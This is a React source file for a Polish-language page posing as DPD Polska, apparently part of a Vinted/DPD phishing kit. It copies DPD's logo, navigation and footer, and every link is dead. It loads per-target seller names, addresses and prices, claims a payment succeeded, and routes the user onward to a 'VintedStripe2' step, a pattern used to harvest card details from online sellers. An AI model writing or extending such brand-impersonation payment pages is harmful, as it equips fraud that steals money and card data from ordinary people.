import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './DpdPlSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/dpd-cz/dpd-logo-official.svg`;

const FOOT_COLS = [
  {
    title: 'Oferta dla firm',
    links: ['Usługi krajowe', 'Usługi międzynarodowe', 'Warunki wysyłki', 'Rozwiązania IT'],
  },
  {
    title: 'Moje DPD',
    links: ['Dokumenty DPD Polska', 'Zostań naszym klientem', 'Znajdź punkt DPD Pickup', 'Zamów kuriera'],
  },
  {
    title: 'O DPD',
    links: ['Aktualności', 'Centrum prasowe'],
  },
  {
    title: 'Kariera w DPD',
    links: ['Oferty pracy'],
  },
];

function noop(e) {
  e.preventDefault();
}

function IconSearch() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="none" aria-hidden>
      <circle cx="10.5" cy="10.5" r="6.5" stroke="currentColor" strokeWidth="2" />
      <path d="M16 16l6 6" stroke="currentColor" strokeWidth="2" strokeLinecap="round" />
    </svg>
  );
}

function IconMenu() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path d="M4 7h16M4 12h16M4 17h16" stroke="currentColor" strokeWidth="2" strokeLinecap="round" />
    </svg>
  );
}

/**
 * DPD Polska — sukces płatności; Dalej → index2 (VintedStripe2).
 */
function DpdPlSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'PL').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'PLN';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceStr = useMemo(() => {
    if (priceNumber == null) return '—';
    return new Intl.NumberFormat('pl-PL', {
      minimumFractionDigits: 0,
      maximumFractionDigits: 2,
    }).format(priceNumber);
  }, [priceNumber]);

  const fullName = [pageData?.first_name, pageData?.middle_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const photoUrl = (pageData?.photo_url || '').trim();
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const amountLine = priceStr === '—' ? '—' : `${priceStr} ${sym}`;

  if (loading && pageCode) {
    return (
      <div className="dpdpl-wrap" lang="pl">
        <div className="dpdpl-loading">Ładowanie…</div>
        <div className="dpdpl-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="dpdpl-wrap" lang="pl">
      <header className="dpdpl-header">
        <div className="dpdpl-header-inner">
          <a href="#/" className="dpdpl-logo-link" onClick={noop} aria-label="DPD">
            <img src={LOGO_SRC} alt="" className="dpdpl-logo" width={86} height={36} />
          </a>
          <nav className="dpdpl-nav" aria-label="Główne">
            <a href="#/" onClick={noop}>
              Odbieram
            </a>
            <a href="#/" onClick={noop}>
              Wysyłam
            </a>
            <a href="#/" onClick={noop}>
              Oferta dla firm
            </a>
            <a href="#/" onClick={noop}>
              Sieć DPD Pickup
            </a>
            <a href="#/" onClick={noop}>
              Moje DPD
            </a>
          </nav>
          <div className="dpdpl-header-tools">
            <a href="#/" onClick={noop} aria-label="Szukaj">
              <IconSearch />
            </a>
            <a href="#/" onClick={noop} aria-label="Menu">
              <IconMenu />
            </a>
          </div>
        </div>
      </header>
      <div className="dpdpl-subbar">
        <div className="dpdpl-subbar-inner">
          <a href="#/" onClick={noop}>
            Zrównoważony rozwój
          </a>
        </div>
      </div>

      <main className="dpdpl-main">
        <h1 className="dpdpl-h1">Twoja płatność się powiodła</h1>
        <div className="dpdpl-grid">
          <div>
            <h2 className="dpdpl-h2">Informacje o dostawie</h2>
            <div className="dpdpl-field">
              <label>Imię i nazwisko</label>
              <div className="dpdpl-input-like">{fullName}</div>
            </div>
            <div className="dpdpl-field">
              <label>Adres dostawy</label>
              <div className="dpdpl-input-like">{address}</div>
            </div>
            <p className="dpdpl-note">
              Jak tylko otrzymasz środki na swoją kartę, wyślij towar do kupującego na podany przez niego adres.
            </p>
          </div>
          <div className="dpdpl-side">
            <div className={`dpdpl-thumb${photoUrl ? '' : ' dpdpl-thumb--ph'}`}>
              {photoUrl ? <img src={photoUrl} alt="" /> : null}
            </div>
            <div className="dpdpl-price-block">
              <h3>Ceny z VAT</h3>
              <div className="dpdpl-price-row">
                <img src={LOGO_SRC} alt="" className="dpdpl-price-logo" height={28} />
                <span className="dpdpl-price-line">
                  <span className="dpdpl-price-val">{amountLine}</span>
                </span>
              </div>
            </div>
            <Link to={index2Path} className="dpdpl-cta">
              Dalej
            </Link>
          </div>
        </div>
      </main>

      <footer className="dpdpl-footer">
        <div className="dpdpl-footer-grid">
          {FOOT_COLS.map((col) => (
            <div key={col.title} className="dpdpl-foot-col">
              <h4>{col.title}</h4>
              {col.links.map((t) => (
                <a key={t} href="#/" onClick={noop}>
                  {t}
                </a>
              ))}
            </div>
          ))}
        </div>
        <div className="dpdpl-social">
          <a href="#/" onClick={noop} aria-label="X">
            X
          </a>
          <a href="#/" onClick={noop} aria-label="LinkedIn">
            in
          </a>
          <a href="#/" onClick={noop} aria-label="Instagram">
            ig
          </a>
          <a href="#/" onClick={noop} aria-label="YouTube">
            ▶
          </a>
        </div>
        <div className="dpdpl-foot-bottom">
          <span>dpdgroup © {new Date().getFullYear()} DPD</span>
          <div className="dpdpl-foot-bottom-links">
            <a href="#/" onClick={noop}>
              Polityka prywatności
            </a>
            <a href="#/" onClick={noop}>
              Kontakt
            </a>
            <a href="#/" onClick={noop}>
              Ochrona danych osobowych
            </a>
            <a href="#/" onClick={noop}>
              Zostań naszym klientem
            </a>
            <a href="#/" onClick={noop}>
              Zostań kurierem
            </a>
            <a href="#/" onClick={noop}>
              DPDgroup
            </a>
          </div>
        </div>
      </footer>

      <div className="dpdpl-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default DpdPlSuccess;
